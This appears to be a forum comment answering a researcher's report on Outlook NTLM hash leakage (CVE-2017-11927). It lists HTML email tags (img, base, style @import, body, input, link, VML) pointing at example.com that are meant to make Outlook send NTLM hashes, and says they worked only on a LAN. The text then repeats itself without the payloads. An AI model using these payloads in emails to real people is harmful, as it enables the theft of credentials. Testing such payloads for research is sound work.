You are saying:
According to MSRC, the CVE-2017-11927 [2] (that was not released initially as a result of our report) had rectified some of the payloads. This patch was updated in May 2018 to address the remaining issues that were included in this report.
So I tried with 3 years old unpatched outlook 2013 to use these tags in email:
Image tag:
<img src="//example.com/anon/test.txt" >
Base tag + image tag:
<base href="//example.com/IDontExist/">
<img>
Style tag:
</style>
@import 'its:/example.com/foo1/test';
@import url(its:/example.com/foo2/test);
</style>
Body tag (Image):
<body background="its:/example.com/IDontExistNew/foobar">
Input tag (Image):
<input type="image" src="its:/example.com/IDontExistNew/foobar" name="test" value="test">
Link tag (Style):
<link rel="stylesheet" href="its:/example.com/IDontExistNew/foobar" />
VML tag (Image):
<v:background xmlns:v="urn:schemas-microsoft-com:vml">
<v:fill src="its:/example.com/IDontExistNew/foobar" />
</v:background>
None of them are sending NTLM hashes over public, they just seem to work on LAN only.
You are saying:
According to MSRC, the CVE-2017-11927 [2] (that was not released initially as a result of our report) had rectified some of the payloads. This patch was updated in May 2018 to address the remaining issues that were included in this report.
So I tried with 3 years old unpatched outlook 2013 to use these tags in email:
None of them are sending NTLM hashes over public, they just seem to work on LAN only.